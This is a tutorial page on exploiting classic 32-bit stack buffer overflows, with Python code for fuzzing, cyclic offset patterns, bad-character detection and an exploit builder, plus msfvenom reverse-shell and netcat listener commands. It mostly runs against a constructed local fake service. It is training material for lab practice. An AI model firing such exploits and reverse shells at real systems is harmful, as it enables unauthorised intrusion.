# Buffer Overflow

The information in this section is compiled from John Hammond, TryHackMe, Tib3rius, SecurityTube DoStackBufferOverflowGood, and Corelan. All links can be found in the Resources section. This section focuses mostly on process and tools for the classic 32-bit stack overflow: a saved return address on the stack is overwritten, the overwritten value lands in EIP, and execution is redirected into attacker-controlled data.

## Basic Process

1. Enumerate Services
2. Fuzzing
3. Finding the Offset
4. Overwriting the EIP
5. Finding the Bad Characters
6. Finding the Right Module
7. Gain Access

In reality, each of these steps has several substeps. The list looks quick and simple, but it can be very time consuming on anything but the simplest buffer overflow, and a mistake in an early step (a wrong offset, a missed bad character) usually only shows up as a failed shell at the end.

## Enumerate Services

Find a running service that accepts input (a network protocol command, an argument, a parsed file) and may be vulnerable to a buffer overflow. Typical candidates are custom or old network services found while port scanning. Once identified, the same binary is normally run on a lab machine under a debugger (for example Immunity Debugger with the mona plugin) so that each crash can be inspected.

## Fuzzing

Send increasingly long strings of a single character (usually `A`) to each command or parameter and watch whether the program crashes: the debugger pauses on an access violation, or the service stops responding. Record the approximate length at which it crashed; that length bounds everything sent in later steps. The SPIKE fuzzers (for example `generic_send_tcp` driven by a `.spk` script) automate this, and a short Python loop does the same job.
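A Python equivalent of the fuzzing step, added here as an example (not from the original page or any of its sources). Because a real target is needed to crash, the block includes a constructed fake service on localhost that stops answering once a command argument exceeds a chosen length; the command name `OVERFLOW1`, the step size and the crash length are all assumptions for the demo.

```python
import socket
import threading

CRASH_AT = 2100  # constructed: the fake service "crashes" once an argument exceeds this length


def fake_vulnerable_service(ready, info, crash_at=CRASH_AT):
    """Constructed stand-in for a target service, used only so the fuzzer can run
    offline: sends a banner, answers short commands with OK, and stops serving
    (as a crashed process would) the first time an argument is longer than crash_at."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))           # port 0: let the OS pick a free port
    srv.listen(5)
    info["port"] = srv.getsockname()[1]
    ready.set()
    alive = True
    while alive:
        conn, _ = srv.accept()
        with conn:
            conn.sendall(b"Welcome\r\n")
            buf = b""
            while b"\r\n" not in buf:    # read one full line, however TCP split it
                chunk = conn.recv(65535)
                if not chunk:
                    break
                buf += chunk
            _cmd, _, arg = buf.partition(b" ")
            if len(arg.rstrip(b"\r\n")) > crash_at:
                alive = False            # "crash": close without replying, stop accepting
            else:
                conn.sendall(b"OK\r\n")
    srv.close()


def fuzz(host, port, prefix=b"OVERFLOW1 ", start=100, step=100, limit=5000, timeout=3.0):
    """Send prefix + 'A' * n for growing n and return the first n at which the
    service no longer answers (connection refused, reset, timed out, or closed
    without a reply). Returns None if it survives every length up to limit.
    prefix is the command under test; OVERFLOW1 is an assumed name for this example."""
    for n in range(start, limit + 1, step):
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.recv(1024)                              # banner
                s.sendall(prefix + b"A" * n + b"\r\n")
                if not s.recv(1024):                      # peer closed without answering
                    return n
        except OSError:                                   # refused / reset / timeout
            return n
    return None


def run_demo():
    """Start the fake service on a thread and fuzz it; returns the crash length."""
    ready, info = threading.Event(), {}
    threading.Thread(target=fake_vulnerable_service, args=(ready, info), daemon=True).start()
    ready.wait(5)
    return fuzz("127.0.0.1", info["port"])


if __name__ == "__main__":
    crashed_at = run_demo()
    print(f"crashed at {crashed_at} bytes" if crashed_at else "no crash up to limit")
```

Against a real target, call `fuzz(target_ip, port)` directly and keep the step coarse; the exact boundary does not matter here, only a length that reliably crashes the service, which the next step refines into an offset.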

## Finding the Offset

Figure out at which point in the stream of data the saved return address is overwritten, i.e. how many bytes come before the four that land in EIP. Instead of counting `A`s, send a cyclic pattern in which every 4-byte sequence is unique (`msf-pattern_create -l <length>`), read the value left in EIP when the program crashes, and look up where those four bytes sit in the pattern (`msf-pattern_offset -l <length> -q <EIP value>`). That position is the offset.
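The pattern tools are small enough to reimplement, which also shows why the lookup works. The block below is an added example (not from the page or the Metasploit project) that generates the same `Aa0Aa1...` cyclic pattern and maps an EIP value back to an offset; the crash value `6F43396E` used in the demo is a constructed example, not a real crash.

```python
import itertools
import string


def pattern_create(length):
    """Return `length` bytes of the Metasploit-style cyclic pattern
    Aa0Aa1Aa2...Aa9Ab0Ab1... Every 4-byte window is unique within the first
    26*26*10*3 = 20280 bytes, so the 4 bytes that land in EIP identify one offset."""
    triplets = itertools.cycle(
        itertools.product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    )
    out = bytearray()
    while len(out) < length:
        out += "".join(next(triplets)).encode()
    return bytes(out[:length])


def pattern_offset(eip_value, length=20280):
    """Map the value the debugger shows in EIP back to an offset in the pattern.
    eip_value may be an int (0x6F43396E) or the hex string shown in the register
    pane ('6F43396E'). x86 is little-endian, so the register's bytes are reversed
    relative to their order in memory; search for the little-endian form."""
    if isinstance(eip_value, str):
        eip_value = int(eip_value, 16)
    needle = eip_value.to_bytes(4, "little")
    idx = pattern_create(length).find(needle)
    return idx if idx != -1 else None   # None: EIP did not come from the pattern


if __name__ == "__main__":
    crash_eip = "6F43396E"   # constructed example value read from the debugger after a crash
    print(pattern_create(40).decode())
    print(f"EIP {crash_eip} -> offset {pattern_offset(crash_eip)}")
```

A `None` result is itself useful: it means the bytes in EIP did not come from the pattern, so either the crash was hit with a different buffer than expected or the pattern was mangled on the way in (a hint that bad characters are present).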

## Overwriting the EIP

Once you have the offset, intentionally overwrite EIP to verify you control it: send `offset` bytes of filler, then four distinct bytes such as `BBBB` (`\x42\x42\x42\x42`), then more filler. If the debugger shows `EIP = 42424242` on the crash, the offset is right. If EIP holds filler bytes, or only some of the `B`s, the offset is off by a few bytes and must be rechecked before going further.

## Finding the Bad Characters

Send the program every byte value from `\x01` to `\xff` (placed after the EIP overwrite, so the bytes land on the stack) and compare what arrives in memory with what was sent, for example with mona's `!mona bytearray` to generate the list and `!mona compare` to diff it against the stack. Any byte that is dropped, changed, or that truncates the rest of the input is a bad character and must not appear in the return address or the shellcode. Usually `\x00` is a bad character, since it terminates C strings, which is why it is excluded from the start. Work through the list one bad character at a time: the bytes immediately after a bad character often look wrong only as a side effect, so remove the first mismatch, resend, and compare again until the dump matches.
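The compare-and-repeat loop from this step, as an added example (not from the page or from mona). Reading memory out of the debugger cannot be automated offline, so the block uses a constructed `fake_target_copy` that mangles input the way a real target might (NUL truncation, LF stripped, CR rewritten); the resulting bad characters `\x00\x0a\x0d` are a property of that fake, not a general rule.

```python
def badchar_candidates(exclude=(0x00,)):
    """Every byte value except the ones already known to be bad. \\x00 is left
    out from the start: it terminates C strings, so it is almost always bad."""
    return bytes(b for b in range(256) if b not in exclude)


def find_first_badchar(sent, dumped):
    """Compare the bytes sent with the bytes the debugger shows on the stack.
    Returns (index, sent_byte, seen_byte) for the first divergence, or None if
    the dump matches. Only the first mismatch is trusted: a bad byte commonly
    shifts, truncates or mangles everything after it, so later differences may
    be side effects rather than bad characters of their own."""
    for i, (a, b) in enumerate(zip(sent, dumped)):
        if a != b:
            return i, a, b
    if len(dumped) < len(sent):          # copy stopped early: truncation
        return len(dumped), sent[len(dumped)], None
    return None


def badchar_rounds(read_stack, exclude=(0x00,), max_rounds=16):
    """Repeat send -> compare -> exclude the first divergent byte until the dump
    matches, and return all bad characters found. read_stack(payload) -> bytes
    stands in for 'send the payload, then read the bytes at ESP in the debugger'."""
    bad = list(exclude)
    for _ in range(max_rounds):
        sent = badchar_candidates(bad)
        diff = find_first_badchar(sent, read_stack(sent))
        if diff is None:
            return bytes(bad)
        bad.append(diff[1])
    raise RuntimeError("still diverging after max_rounds; check the comparison")


def fake_target_copy(data):
    """Constructed stand-in for what a target does to the input on its way to the
    stack: a C string copy stops at NUL, a line parser strips LF, and CR is
    rewritten to a space. Exists only to exercise the functions above offline."""
    data = data.split(b"\x00")[0]
    data = data.replace(b"\x0a", b"")
    return data.replace(b"\x0d", b" ")


if __name__ == "__main__":
    found = badchar_rounds(fake_target_copy)
    print("bad chars:", " ".join(f"\\x{b:02x}" for b in found))
```

Note what the first round reports against the fake: the mismatch is at `\x0a`, but the byte seen there is `\x0b`, because the dropped byte shifted everything after it. Marking every differing byte as bad at that point would wrongly exclude most of the alphabet, which is why only the first divergence is removed per round.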

## Finding the Right Module

You need a module loaded by the program that has no memory protections (no ASLR, DEP, SafeSEH or Rebase; `!mona modules` lists what is loaded and which protections apply) and that contains a `JMP ESP` instruction (opcode `FF E4`) at an address with no bad characters. Overwriting EIP with that address makes the program jump into memory you control: after the return, ESP points just past the overwritten return address, so `JMP ESP` lands on whatever you placed after it. Remember to write the address in little-endian byte order.

## Gain Access

Generate shellcode with the bad characters excluded (for example `msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00" -f py`), put a short NOP sled (`\x90` bytes) in front of it because an encoded payload decodes itself in place and needs a little room, start a listener, and send filler + return address + NOP sled + shellcode to the program. If the shell does not come back, recheck the offset, the bad characters, and the byte order of the address before anything else.
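The final exploit skeleton that assembles steps 4 (EIP check) and 7 (payload), added here as an example and not taken from the page or any of its sources. Everything target-specific is an assumption for the demo: the command name `OVERFLOW1`, offset 1978, bad characters `\x00\x0a\x0d`, and the `JMP ESP` address `0x625011AF` are placeholders standing in for the results of the earlier steps. The "shellcode" is a run of `INT3` breakpoints (`\xcc`), which is a useful first payload under a debugger because hitting them proves execution reached the buffer; real shellcode comes from msfvenom.

```python
import socket
import struct


def p32(addr):
    """Pack a 32-bit address little-endian, the byte order x86 stores a dword in."""
    return struct.pack("<I", addr)


def check_badchars(label, data, badchars):
    """Refuse to build a payload whose return address or shellcode contains a byte
    the target mangles; otherwise the exploit fails silently at the last step."""
    hits = sorted({b for b in data if b in badchars})
    if hits:
        raise ValueError(f"{label} contains bad chars: " + " ".join(f"\\x{b:02x}" for b in hits))


def build_eip_check(prefix, offset, marker=b"BBBB", filler_after=600):
    """Step 4: prefix | 'A' * offset | BBBB | 'C' * filler_after.
    A crash with EIP = 42424242 confirms the offset."""
    return prefix + b"A" * offset + marker + b"C" * filler_after + b"\r\n"


def build_payload(prefix, offset, ret_addr, shellcode, badchars=b"\x00", nops=16, total=None):
    """Step 7: prefix | 'A' * offset | JMP ESP address | NOP sled | shellcode.
    ret_addr goes in little-endian. The NOP sled gives an encoded payload room
    to decode itself. If total is given, pad with 'C' up to the crash length."""
    ret = p32(ret_addr)
    check_badchars("return address", ret, badchars)
    check_badchars("shellcode", shellcode, badchars)
    payload = prefix + b"A" * offset + ret + b"\x90" * nops + shellcode
    if total is not None:
        if len(payload) > total:
            raise ValueError("payload is longer than the length that crashed the service")
        payload += b"C" * (total - len(payload))
    return payload + b"\r\n"


def send_payload(host, port, payload, timeout=5.0):
    """Deliver the payload over TCP. Start the listener (nc -lvnp <port>) first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)          # banner, if the service sends one
        s.sendall(payload)


if __name__ == "__main__":
    PREFIX = b"OVERFLOW1 "       # assumed command name, not from the original page
    OFFSET = 1978                # assumed offset found in step 3
    JMP_ESP = 0x625011AF         # placeholder address of an FF E4 (JMP ESP) from step 6
    BADCHARS = b"\x00\x0a\x0d"   # assumed result of step 5
    # Placeholder shellcode: INT3 breakpoints. Under a debugger, hitting them proves
    # execution reached the buffer. Replace with msfvenom output, e.g.
    # msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0a\x0d" -f py
    shellcode = b"\xcc" * 8
    payload = build_payload(PREFIX, OFFSET, JMP_ESP, shellcode, BADCHARS)
    eip = payload[len(PREFIX) + OFFSET:len(PREFIX) + OFFSET + 4]
    print(f"{len(payload)} bytes; EIP will hold {eip.hex()} (little-endian {JMP_ESP:#010x})")
    # send_payload("10.10.10.10", 1337, payload)   # target is an assumption; uncomment to fire
```

`check_badchars` is the part most often skipped by hand: an address such as `0x62500AFF` looks fine in the debugger but packs to `\xff\x0a\x50\x62`, and if `\x0a` is bad the jump never happens. Failing loudly at build time is cheaper than staring at a listener that never connects.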

## Resources

* <https://github.com/joshua17sc/Buffer-Overflows>

